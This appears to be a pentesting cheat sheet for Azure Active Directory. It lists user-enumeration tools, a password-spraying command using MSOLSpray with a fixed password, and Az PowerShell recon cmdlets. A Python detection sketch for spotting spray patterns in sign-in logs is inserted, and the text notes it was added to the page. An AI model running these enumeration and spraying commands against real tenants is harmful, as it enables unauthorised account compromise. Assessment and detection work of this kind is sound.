Pentesting Azure Active Directory
Unauthenticated Recon
User Email Enumeration
python3 onedrive_enum.py -U users.txt -d companyname.com -v
If the output URLs return 404 File Not Found, the users are bad/invalid.
If they redirect to the sign-in page, the user account is valid.
Valid Email Enumeration
python3 o365creeper.py -e test@email.com
python3 o365creeper.py -f email-list.txt -o validated-out-file.txt
Cloud Enum
python3 cloud_enum.py -k tesla --disable-aws --disable-gcp
Password Spraying
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\mails.txt.txt -Password P@ssword123
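Seen from the sign-in logs, the spray above is one source failing against many accounts in a short window. A detection sketch, added here as an example and not part of the original page or of MSOLSpray; the flattened record fields, the thresholds and the sample events are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# AADSTS codes seen during a spray: bad password, unknown user, smart lockout.
FAILURE_CODES = {50126, 50034, 50053}

def detect_spray(events, min_users=5, window=timedelta(minutes=10)):
    """Return {ip: sorted users} for IPs whose failed sign-ins hit at least
    min_users distinct accounts inside one sliding time window."""
    by_ip = defaultdict(list)
    for e in events:
        if e["errorCode"] in FAILURE_CODES:
            ts = datetime.fromisoformat(e["createdDateTime"])
            by_ip[e["ipAddress"]].append((ts, e["userPrincipalName"].lower()))
    hits = {}
    for ip, fails in by_ip.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # Advance the left edge until the span fits inside the window.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_users:
                hits.setdefault(ip, set()).update(users)
    return {ip: sorted(u) for ip, u in hits.items()}

def make_event(ts, user, ip, code):
    # Hypothetical flattened sign-in record (field names are assumptions).
    return {"createdDateTime": ts, "userPrincipalName": user,
            "ipAddress": ip, "errorCode": code}

# Constructed sample: one IP fails against six accounts within seconds; a
# second IP is a single user mistyping a password, then signing in (code 0).
SAMPLE = [make_event(f"2024-01-15T09:00:{i:02d}", f"user{i}@example.com",
                     "203.0.113.10", 50034 if i == 3 else 50126) for i in range(6)]
SAMPLE += [make_event(f"2024-01-15T09:0{i}:00", "alice@example.com",
                      "198.51.100.7", 50126) for i in range(3)]
SAMPLE.append(make_event("2024-01-15T09:05:00", "alice@example.com", "198.51.100.7", 0))

if __name__ == "__main__":
    for ip, users in detect_spray(SAMPLE).items():
        print(f"possible spray from {ip}: {len(users)} accounts")
```

A spray paced slower than the window slips under the default threshold, so tune window and min_users to the tenant's lockout policy.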

Authenticated Recon
First, install the Azure Az PowerShell module:
Install-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force
Connect to the Azure account with Connect-AzAccount

Enumerating with PowerShell
# List the contexts available to the current user
Get-AzContext -ListAvailable
# Get subscriptions
Get-AzSubscription
# Current user's role assignment
Get-AzRoleAssignment
# List all resources and resource groups
Get-AzResource
Get-AzResourceGroup
# List storage accounts
Get-AzStorageAccount
# List all web apps for exploitation
Get-AzWebApp
# List Automation accounts
Get-AzAutomationAccount
# Display all virtual networks
Get-AzVirtualNetwork
# Get public IP addresses
Get-AzPublicIpAddress
Continues...